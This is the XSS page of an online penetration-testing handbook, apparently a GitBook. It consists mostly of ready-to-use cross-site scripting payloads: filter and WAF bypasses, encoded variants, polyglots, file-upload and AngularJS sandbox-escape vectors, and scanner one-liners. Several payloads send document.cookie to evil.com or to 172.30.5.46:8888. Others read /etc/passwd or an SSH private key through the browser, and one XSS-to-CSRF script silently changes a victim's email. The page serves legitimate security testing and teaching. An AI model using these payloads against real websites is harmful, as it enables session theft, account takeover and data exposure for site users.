Pentest Book
Search…
/home/six2dez/.pentest-book
Contribute/Donate
Recon
Public info gathering
AIO Recon Tools
Domain Enum
Subdomain Enum
Network Scanning
Host Scanning
Packet Scanning
Enumeration
Files
SSL/TLS
Ports
Web Attacks
General Info
Quick tricks
Header injections
Bruteforcing
Online hashes cracked
Crawl/Fuzz
LFI/RFI
File upload
SQLi
SSRF
Open redirects
XSS
CSP
XXE
Cookie Padding
Webshells
CORS
CSRF
Web Cache Poisoning
Broken Links
Clickjacking
HTTP Request Smuggling
Web Sockets
CRLF
IDOR
Web Cache Deception
Session fixation
Email attacks
Pastejacking
HTTP Parameter pollution
SSTI
Prototype Pollution
Command Injection
Deserialization
Web Technologies
Cloud
Exploitation
Payloads
Reverse Shells
File transfer
Post Exploitation
Linux
Pivoting
Windows
Mobile
General
Android
iOS
Others
Burp Suite
Password cracking
VirtualBox
Code review
Pentesting Web checklist
Internal Pentest
Web fuzzers review
Recon suites review
Subdomain tools review
Random
Master assessment mindmaps
BugBounty
Exploiting
tools everywhere
Powered By GitBook
XSS
Cross-Site Scripting (XSS) Cheat Sheet - 2021 Edition | Web Security Academy
WebSecAcademy
Try XSS in every input field, host headers, url redirections, URI paramenters and file upload namefiles.
Actions: phising through iframe, cookie stealing, always try convert self to reflected.

Tools

1
# https://github.com/hahwul/dalfox
2
dalfox url http://testphp.vulnweb.com/listproducts.php
3
4
# https://github.com/KathanP19/Gxss
5
# Replace every param value with word FUZZ
6
echo "https://target.com/some.php?first=hello&last=world" | Gxss -c 100
7
8
# XSpear
9
gem install XSpear
10
XSpear -u 'https://web.com' -a
11
XSpear -u 'https://www.web.com/?q=123' --cookie='role=admin' -v 1 -a -b https://six2dez.xss.ht -t 20
12
XSpear -u "http://testphp.vulnweb.com/search.php?test=query" -p test -v 1
13
14
# Xira
15
# https://github.com/xadhrit/xira
16
python3 xira.py -u url
17
18
# Hosting XSS
19
# surge.sh
20
npm install --global surge
21
mkdir mypayload
22
cd mypayload
23
echo "alert(1)" > payload.js
24
surge # It returns the url
25
26
# XSS vectors
27
https://gist.github.com/kurobeats/9a613c9ab68914312cbb415134795b45
28
29
# Payload list
30
https://github.com/m0chan/BugBounty/blob/master/xss-payload-list.txt
31
32
https://github.com/terjanq/Tiny-XSS-Payloads
33
34
# XSS to RCE
35
# https://github.com/shelld3v/JSshell
36
37
# Polyglots
38
# https://github.com/0xsobky/HackVault/wiki/Unleashing-an-Ultimate-XSS-Polyglot
39
40
# XSS browser
41
# https://github.com/RenwaX23/XSSTRON
42
43
# Blind
44
# https://github.com/hipotermia/vaya-ciego-nen
Copied!

Oneliners

1
# WaybackUrls
2
echo "domain.com" | waybackurls | httpx -silent | Gxss -c 100 -p Xss | sort -u | dalfox pipe -b https://six2dez.xss.ht
3
# Param discovery based
4
paramspider -d target.com > /filepath/param.txt && dalfox -b https://six2dez.xss.ht file /filepath/param.txt
5
# Blind XSS
6
cat target_list.txt | waybackurls -no-subs | grep "https://" | grep -v "png\|jpg\|css\|js\|gif\|txt" | grep "=" | qsreplace -a | dalfox pipe -b https://six2dez.xss.ht
7
# Reflected XSS
8
echo "domain.com" | waybackurls | gf xss | kxss
Copied!

XSS recopilation

Basics

1
# Locators
2
'';!--"<XSS>=&{()}
3
4
# 101
5
<script>alert(1)</script>
6
<script>+-+-1-+-+alert(1)</script>
7
<script>+-+-1-+-+alert(/xss/)</script>
8
%3Cscript%3Ealert(0)%3C%2Fscript%3E
9
%253Cscript%253Ealert(0)%253C%252Fscript%253E
10
<svg onload=alert(1)>
11
"><svg onload=alert(1)>
12
<iframe src="javascript:alert(1)">
13
"><script src=data:&comma;alert(1)//
14
<noscript><p title="</noscript><img src=x onerror=alert(1)>">
15
%5B'-alert(document.cookie)-'%5D
Copied!

By tag

1
# Tag filter bypass
2
<svg/onload=alert(1)>
3
<script>alert(1)</script>
4
<script >alert(1)</script>
5
<ScRipT>alert(1)</sCriPt>
6
<%00script>alert(1)</script>
7
<script>al%00ert(1)</script>
8
9
# HTML tags
10
<img/src=x a='' onerror=alert(1)>
11
<IMG """><SCRIPT>alert(1)</SCRIPT>">
12
<img src=`x`onerror=alert(1)>
13
<img src='/' onerror='alert("kalisa")'>
14
<IMG SRC=# onmouseover="alert('xxs')">
15
<IMG SRC= onmouseover="alert('xxs')">
16
<IMG onmouseover="alert('xxs')">
17
<BODY ONLOAD=alert('XSS')>
18
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
19
<SCRIPT SRC=http:/evil.com/xss.js?< B >
20
"><XSS<test accesskey=x onclick=alert(1)//test
21
<svg><discard onbegin=alert(1)>
22
<script>image = new Image(); image.src="https://evil.com/?c="+document.cookie;</script>
23
<script>image = new Image(); image.src="http://"+document.cookie+"evil.com/";</script>
24
25
# Other tags
26
<BASE HREF="javascript:alert('XSS');//">
27
<DIV STYLE="width: expression(alert('XSS'));">
28
<TABLE BACKGROUND="javascript:alert('XSS')">
29
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
30
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
31
<xss id=x tabindex=1 onactivate=alert(1)></xss>
32
<xss onclick="alert(1)">test</xss>
33
<xss onmousedown="alert(1)">test</xss>
34
<body onresize=alert(1)>”onload=this.style.width=‘100px’>
35
<xss id=x onfocus=alert(document.cookie)tabindex=1>#x’;</script>
36
37
# CharCode
38
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
39
40
# Input already in script tag
41
@domain.com">user+'-alert`1`-'@domain.com
42
43
# Scriptless
44
<link rel=icon href="//evil?
45
<iframe src="//evil?
46
<iframe src="//evil?
47
<input type=hidden type=image src="//evil?
48
49
# Unclosed Tags
50
<svg onload=alert(1)//
Copied!

Blind

1
# Blind XSS
2
# https://github.com/LewisArdern/bXSS
3
# https://github.com/ssl/ezXSS
4
# https://xsshunter.com/
5
6
# Blind XSS detection
7
# Xsshunter payload in every field
8
# Review forms
9
# Contact Us pages
10
# Passwords(You never know if the other side doesn’t properly handle input and if your password is in View mode)
11
# Address fields of e-commerce sites
12
# First or Last Name field while doing Credit Card Payments
13
# Set User-Agent to a Blind XSS payload. You can do that easily from a proxy such as Burpsuite.
14
# Log Viewers
15
# Feedback Page
16
# Chat Applications
17
# Any app that requires user moderation
18
# Host header
19
# Why cancel subscription? forms
Copied!

Bypasses

1
# No parentheses
2
<script>onerror=alert;throw 1</script>
3
<script>throw onerror=eval,'=alert\x281\x29'</script>
4
<script>'alert\x281\x29'instanceof{[Symbol.hasInstance]:eval}</script>
5
<script>location='javascript:alert\x281\x29'</script>
6
<script>alert`1`</script>
7
<script>new Function`X${document.location.hash.substr`1`}`</script>
8
9
# No parentheses and no semicolons
10
<script>{onerror=alert}throw 1</script>
11
<script>throw onerror=alert,1</script>
12
<script>onerror=alert;throw 1337</script>
13
<script>{onerror=alert}throw 1337</script>
14
<script>throw onerror=alert,'some string',123,'haha'</script>
15
16
# No parentheses and no spaces:
17
<script>Function`X${document.location.hash.substr`1`}```</script>
18
19
# Angle brackets HTML encoded (in an attribute)
20
“onmouseover=“alert(1)
21
‘-alert(1)-’
22
23
# If quote is escaped
24
‘}alert(1);{‘
25
‘}alert(1)%0A{‘
26
\’}alert(1);{//
27
28
# Embedded tab, newline, carriage return to break up XSS
29
<IMG SRC="jav&#x09;ascript:alert('XSS');">
30
<IMG SRC="jav&#x0A;ascript:alert('XSS');">
31
<IMG SRC="jav&#x0D;ascript:alert('XSS');">
32
33
# RegEx bypass
34
<img src="X" onerror=top[8680439..toString(30)](1337)>
35
36
# Other
37
<svg/onload=eval(atob(‘YWxlcnQoJ1hTUycp’))>: base64 value which is alert(‘XSS’)
Copied!

Encoded

1
# Unicode
2
<script>\u0061lert(1)</script>
3
<script>\u{61}lert(1)</script>
4
<script>\u{0000000061}lert(1)</script>
5
6
# Hex
7
<script>eval('\x61lert(1)')</script>
8
9
# HTML
10
<svg><script>&#97;lert(1)</script></svg>
11
<svg><script>&#x61;lert(1)</script></svg>
12
<svg><script>alert&NewLine;(1)</script></svg>
13
<svg><script>x="&quot;,alert(1)//";</script></svg>
14
\’-alert(1)//
15
16
# URL
17
<a href="javascript:x='%27-alert(1)-%27';">XSS</a>
18
19
# Double URL Encode
20
%253Csvg%2520o%256Enoad%253Dalert%25281%2529%253E
21
%2522%253E%253Csvg%2520o%256Enoad%253Dalert%25281%2529%253E
22
23
# Unicode + HTML
24
<svg><script>&#x5c;&#x75;&#x30;&#x30;&#x36;&#x31;&#x5c;&#x75;&#x30;&#x30;&#x36;&#x63;&#x5c;&#x75;&#x30;&#x30;&#x36;&#x35;&#x5c;&#x75;&#x30;&#x30;&#x37;&#x32;&#x5c;&#x75;&#x30;&#x30;&#x37;&#x34;(1)</script></svg>
25
26
# HTML + URL
27
<iframe src="javascript:'&#x25;&#x33;&#x43;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x25;&#x33;&#x45;&#x61;&#x6c;&#x65;&#x72;&#x74;&#x28;&#x31;&#x29;&#x25;&#x33;&#x43;&#x25;&#x32;&#x46;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x25;&#x33;&#x45;'"></iframe>
Copied!

Polyglots

1
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
2
-->'"/></sCript><deTailS open x=">" ontoggle=(co\u006efirm)``>
3
oNcliCk=alert(1)%20)//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>%5Cx3csVg/<img/src/onerror=alert(2)>%5Cx3e
4
javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(document.domain)//'>
5
javascript:alert();//<img src=x:x onerror=alert(1)>\";alert();//";alert();//';alert();//`;alert();// alert();//*/alert();//--></title></textarea></style></noscript></noembed></template></select></script><frame src=javascript:alert()><svg onload=alert()><!--
6
';alert(String.fromCharCode(88,83,83))//';alert(String. fromCharCode(88,83,83))//";alert(String.fromCharCode (88,83,83))//";alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83)) </SCRIPT>
7
">><marquee><img src=x onerror=confirm(1)></marquee>" ></plaintext\></|\><plaintext/onmouseover=prompt(1) ><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->" ></script><script>alert(1)</script>"><img/id="confirm&lpar; 1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="http: //i.imgur.com/P8mL8.jpg">
8
```
9
%3C!%27/!%22/!\%27/\%22/ — !%3E%3C/Title/%3C/script/%3E%3CInput%20Type=Text%20Style=position:fixed;top:0;left:0;font-size:999px%20*/;%20Onmouseenter=confirm1%20//%3E#
10
<!'/!”/!\'/\"/ — !></Title/</script/><Input Type=Text Style=position:fixed;top:0;left:0;font-size:999px */; Onmouseenter=confirm1 //>#
11
jaVasCript:/-//*\/'/"/*/(/ */oNcliCk=alert() )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/ — !>\x3csVg/<sVg/oNloAd=alert()//>\x3e
12
">>
13
” ></plaintext></|><plaintext/onmouseover=prompt(1) >prompt(1)@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>’ →” > "></script>alert(1)”><img/id="confirm( 1)"/alt="/"src="/"onerror=eval(id&%23x29;>'">">
14
" onclick=alert(1)//<button ' onclick=alert(1)//> */ alert(1)//
15
?msg=<img/src=`%00`%20onerror=this.onerror=confirm(1)
16
<svg/onload=eval(atob(‘YWxlcnQoJ1hTUycp’))>
17
<sVg/oNloAd=”JaVaScRiPt:/**\/*\’/”\eval(atob(‘Y29uZmlybShkb2N1bWVudC5kb21haW4pOw==’))”> <iframe src=jaVaScrIpT:eval(atob(‘Y29uZmlybShkb2N1bWVudC5kb21haW4pOw==’))>
18
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
19
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert())//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
20
'">><marquee><img src=x onerror=confirm(1)></marquee>"></plaintext\></|\><plaintext/onmouse over=prompt(1)><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->"></script><script>alert(1)</script>"><img/id="confirm&lpar;1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><imgsrc="http://i.imgur.com/P8mL8.jpg">
21
22
# No parenthesis, back ticks, brackets, quotes, braces
23
a=1337,b=confirm,c=window,c.onerror=b;throw-a
24
25
# Another uncommon
26
'-(a=alert,b="_Y000!_",[b].find(a))-'
27
28
# Common XSS in HTML Injection
29
<svg onload=alert(1)>
30
</tag><svg onload=alert(1)>
31
"></tag><svg onload=alert(1)>
32
'onload=alert(1)><svg/1='
33
'>alert(1)</script><script/1='
34
*/alert(1)</script><script>/*
35
*/alert(1)">'onload="/*<svg/1='
36
`-alert(1)">'onload="`<svg/1='
37
*/</script>'>alert(1)/*<script/1='
38
p=<svg/1='&q='onload=alert(1)>
39
p=<svg 1='&q='onload='/*&r=*/alert(1)'>
40
q=<script/&q=/src=data:&q=alert(1)>
41
<script src=data:,alert(1)>
42
# inline
43
"onmouseover=alert(1) //
44
"autofocus onfocus=alert(1) //
45
# src attribute
46
javascript:alert(1)
47
# JS injection
48
'-alert(1)-'
49
'/alert(1)//
50
\'/alert(1)//
51
'}alert(1);{'
52
'}alert(1)%0A{'
53
\'}alert(1);{//
54
/alert(1)//\
55
/alert(1)}//\
56
${alert(1)}
57
58
# XSS onscroll
59
<p style=overflow:auto;font-size:999px onscroll=alert(1)>AAA<x/id=y></p>#y
60
61
# XSS filter bypasss polyglot:
62
';alert(String.fromCharCode(88,83,83))//';alert(String. fromCharCode(88,83,83))//";alert(String.fromCharCode (88,83,83))//";alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83)) </SCRIPT>
63
">><marquee><img src=x onerror=confirm(1)></marquee>" ></plaintext\></|\><plaintext/onmouseover=prompt(1) ><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->" ></script><script>alert(1)</script>"><img/id="confirm&lpar; 1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="http: //i.imgur.com/P8mL8.jpg">
64
65
" <script> x=new XMLHttpRequest; x.onload=function(){ document.write(this.responseText.fontsize(1)) }; x.open("GET","file:///home/reader/.ssh/id_rsa"); x.send(); </script>
66
" <script> x=new XMLHttpRequest; x.onload=function(){ document.write(this.responseText) }; x.open("GET","file:///etc/passwd"); x.send(); </script>
67
68
# GO SSTI
69
{{define "T1"}}<script>alert(1)</script>{{end}} {{template "T1"}}`
70
71
# Some XSS exploitations
72
- host header injection through xss
73
add referer: batman
74
hostheader: bing.com">script>alert(document.domain)</script><"
75
- URL redirection through xss
76
document.location.href="http://evil.com"
77
- phishing through xss - iframe injection
78
<iframe src="http://evil.com" height="100" width="100"></iframe>
79
- Cookie stealing through xss
80
https://github.com/lnxg33k/misc/blob/master/XSS-cookie-stealer.py
81
https://github.com/s0wr0b1ndef/WebHacking101/blob/master/xss-reflected-steal-cookie.md
82
<script>var i=new Image;i.src="http://172.30.5.46:8888/?"+document.cookie;</script>
83
<img src=x onerror=this.src='http://172.30.5.46:8888/?'+document.cookie;>
84
<img src=x onerror="this.src='http://172.30.5.46:8888/?'+document.cookie; this.removeAttribute('onerror');">
85
- file upload through xss
86
upload a picturefile, intercept it, change picturename.jpg to xss paylaod using intruder attack
87
- remote file inclusion (RFI) through xss
88
php?=http://brutelogic.com.br/poc.svg - xsspayload
89
- convert self xss to reflected one
90
copy response in a file.html -> it will work
91
92
# XSS to SSRF
93
<esi:include src="http://yoursite.com/capture" />
94
95
# XSS to LFI
96
<script> x=new XMLHttpRequest; x.onload=function(){ document.write(this.responseText) }; x.open("GET","file:///etc/passwd"); x.send();</script>
97
98
<img src="xasdasdasd" onerror="document.write('<iframe src=file:///etc/passwd></iframe>')"/>
99
<script>document.write('<iframe src=file:///etc/passwd></iframe>');</scrip>
Copied!

XSS in files

1
# XSS in filename:
2
"><img src=x onerror=alert(document.domain)>.gif
3
4
# XSS in metadata:
5
exiftool -FIELD=XSS FILE
6
exiftool -Artist=' "><img src=1 onerror=alert(document.domain)>' brute.jpeg
7
exiftool -Artist='"><script>alert(1)</script>' dapos.jpeg
8
9
# XSS in GIF Magic Number:
10
GIF89a/*<svg/onload=alert(1)>*/=alert(document.domain)//;
11
# If image can't load:
12
url.com/test.php?p=<script src=http://url.com/upload/img/xss.gif>
13
14
# XSS in png:
15
https://www.secjuice.com/hiding-javascript-in-png-csp-bypass/
16
17
# XSS in PDF:
18
https://www.noob.ninja/2017/11/local-file-read-via-xss-in-dynamically.html?m=1
19
20
# XSS upload filename:
21
cp somefile.txt \"\>\<img\ src\ onerror=prompt\(1\)\>
22
<img src=x onerror=alert('XSS')>.png
23
"><img src=x onerror=alert('XSS')>.png
24
"><svg onmouseover=alert(1)>.svg
25
<<script>alert('xss')<!--a-->a.png
26
"><svg onload=alert(1)>.gif
27
28
# XSS Svg Image upload
29
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
30
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
31
<script type="text/javascript">
32
alert('XSS!');
33
</script>
34
</svg>
35
36
# XSS svg image upload 2
37
# If you're testing a text editor on a system that you can also upload files to, try to embed an svg:
38
<iframe src="https://s3-us-west-2.amazonaws.com/s.cdpn.io/3/movingcart_1.svg" frameborder="0"></iframe>
39
#If that works, upload an SVG with the following content and try rendering it using the text editor:
40
<svg xmlns="http://www.w3.org/2000/svg">
41
<script>alert(document.domain)</script>
42
</svg>
43
44
# XSS in SVG 3:
45
<svg xmlns="http://www.w3.org/2000/svg" onload="alert(document.domain)"/>
46
47
# XSS in XML
48
<html>
49
<head></head>
50
<body>
51
<something:script xmlns:something="http://www.w3.org/1999/xhtml">alert(1)</something:script>
52
</body>
53
</html>
54
55
# https://brutelogic.com.br/blog/file-upload-xss/
56
57
" ="" '></><script></script><svg onload"="alertonload=alert(1)"" onload=setInterval'alert\x28document.domain\x29'
58
59
# XSS in existent jpeg:
60
exiftool -Artist='"><svg onload=alert(1)>' xss.jpeg
61
62
# XSS in url (and put as header)
63
http://acme.corp/?redir=[URI_SCHEME]://gremwell.com%0A%0A[XSS_PAYLOAD]
64
65
# XSS in XML
66
<?xml version="1.0" encoding="UTF-8"?>
67
<html xmlns:html="http://w3.org/1999/xhtml">
68
<html:script>prompt(document.domain);</html:script>
69
</html>
Copied!

DOM XSS

1
<img src=1 onerror=alert(1)>
2
<iframe src=javascript:alert(1)>
3
<details open ontoggle=alert(1)>
4
<svg><svg onload=alert(1)>
5
data:text/html,<img src=1 onerror=alert(1)>
6
data:text/html,<iframe src=javascript:alert(1)>
7
<iframe src=TARGET_URL onload="frames[0].postMessage('INJECTION','*')">
8
"><svg onload=alert(1)>
9
javascript:alert(document.cookie)
10
\"-alert(1)}//
Copied!

XSS to CSRF

1
# Example:
2
3
# Detect action to change email, with anti csrf token, get it and paste this in a comment to change user email:
4
5
<script>
6
var req = new XMLHttpRequest();
7
req.onload = handleResponse;
8
req.open('get','/email',true);
9
req.send();
10
function handleResponse() {
11
var token = this.responseText.match(/name="csrf" value="(\w+)"/)[1];
12
var changeReq = new XMLHttpRequest();
13
changeReq.open('post', '/email/change-email', true);
14
changeReq.send('csrf='+token+'&[email protected]')
15
};
16
</script>
Copied!

AngularJS Sandbox

1
# Removed in AngularJS 1.6
2
# Is a way to avoid some strings like window, document or __proto__.
3
4
# Without strings:
5
/?search=1&toString().constructor.prototype.charAt%3d[].join;[1]|orderBy:toString().constructor.fromCharCode(120,61,97,108,101,114,116,40,49,41)=1
6
7
# With CSP:
8
9
<script>
10
location='https://your-lab-id.web-security-academy.net/?search=%3Cinput%20id=x%20ng-focus=$event.path|orderBy:%27(z=alert)(document.cookie)%27%3E#x';
11
</script>
12
13
# v 1.6 and up
14
{{$new.constructor('alert(1)')()}}
15
<x ng-app>{{$new.constructor('alert(1)')()}}
16
17
{{constructor.constructor('alert(1)')()}}
18
{{constructor.constructor('import("https://six2dez.xss.ht")')()}}
19
{{$on.constructor('alert(1)')()}}
20
{{{}.")));alert(1)//"}}
21
{{{}.")));alert(1)//"}}
22
toString().constructor.prototype.charAt=[].join; [1,2]|orderBy:toString().constructor.fromCharCode(120,61,97,108,101,11 4,116,40,49,41)
Copied!

XSS in JS

1
# Inside JS script:
2
</script><img src=1 onerror=alert(document.domain)>
3
</script><script>alert(1)</script>
4
5
# Inside JS literal script:
6
'-alert(document.domain)-'
7
';alert(document.domain)//
8
'-alert(1)-'
9
10
# Inside JS that escape special chars:
11
If ';alert(document.domain)// is converted in \';alert(document.domain)//
12
Use \';alert(document.domain)// to obtain \\';alert(document.domain)//
13
\'-alert(1)//
14
15
# Inside JS with some char blocked:
16
onerror=alert;throw 1
17
/post?postId=5&%27},x=x=%3E{throw/**/onerror=alert,1337},toString=x,window%2b%27%27,{x:%27
18
19
# Inside {}
20
${alert(document.domain)}
21
${alert(1)}
Copied!

XSS Waf Bypasses

1
# Only lowercase block
2
<sCRipT>alert(1)</sCRipT>
3
4
# Break regex
5
<script>%0aalert(1)</script>
6
7
# Double encoding
8
%2522
9
10
# Recursive filters
11
<scr<script>ipt>alert(1)</scr</script>ipt>
12
13
# Inject anchor tag
14
<a/href="j&Tab;a&Tab;v&Tab;asc&Tab;ri&Tab;pt:alert&lpar;1&rpar;">
15
16
# Bypass whitespaces
17
<svg·onload=alert(1)>
18
19
# Change GET to POST request
20
21
# Imperva Incapsula
22
%3Cimg%2Fsrc%3D%22x%22%2Fonerror%3D%22prom%5Cu0070t%2526%2523x28%3B%2526%25 23x27%3B%2526%2523x58%3B%2526%2523x53%3B%2526%2523x53%3B%2526%2523x27%3B%25 26%2523x29%3B%22%3E
23
<img/src="x"/onerror="[JS-F**K Payload]">
24
<iframe/onload='this["src"]="javas&Tab;cript:al"+"ert``"';><img/src=q onerror='new Function`al\ert\`1\``'>
25
26
# WebKnight
27
<details ontoggle=alert(1)>
28
<div contextmenu="xss">Right-Click Here<menu id="xss" onshow="alert(1)">
29
30
# F5 Big IP
31
<body style="height:1000px" onwheel="[DATA]">
32
<div contextmenu="xss">Right-Click Here<menu id="xss" onshow="[DATA]">
33
<body style="height:1000px" onwheel="[JS-F**k Payload]">
34
<div contextmenu="xss">Right-Click Here<menu id="xss" onshow="[JS-F**k Payload]">
35
<body style="height:1000px" onwheel="prom%25%32%33%25%32%36x70;t(1)">
36
<div contextmenu="xss">Right-Click Here<menu id="xss" onshow="prom%25%32%33%25%32%36x70;t(1)">
37
38
# Barracuda WAF
39
<body style="height:1000px" onwheel="alert(1)">
40
<div contextmenu="xss">Right-Click Here<menu id="xss" onshow="alert(1)">
41
42
# PHP-IDS
43
<svg+onload=+"[DATA]"
44
<svg+onload=+"aler%25%37%34(1)"
45
46
# Mod-Security
47
<a href="j[785 bytes of (&NewLine;&Tab;)]avascript:alert(1);">XSS</a>
48
1⁄4script3⁄4alert(¢xss¢)1⁄4/script3⁄4
49
<b/%25%32%35%25%33%36%25%36%36%25%32%35%25%33%36%25%36%35mouseover=alert(1)>
50
51
# Quick Defense:
52
<input type="search" onsearch="aler\u0074(1)">
53
<details ontoggle="aler\u0074(1)">
54
55
# Sucuri WAF
56
1⁄4script3⁄4alert(¢xss¢)1⁄4/script3⁄4
57
58
# Akamai
59
1%3C/script%3E%3Csvg/onload=prompt(document[domain])%3E
60
<SCr%00Ipt>confirm(1)</scR%00ipt>
61
# AngularJS
62
{{constructor.constructor(alert 1 )()}}
Copied!

XSS Mindmap

Previous
Open redirects
Next
CSP
Last modified 4mo ago
Export as PDF
Copy link
Contents
Tools
Oneliners
XSS recopilation
Basics
By tag
Blind
Bypasses
Encoded
Polyglots
XSS in files
DOM XSS
XSS to CSRF
AngularJS Sandbox
XSS in JS
XSS Waf Bypasses
XSS Mindmap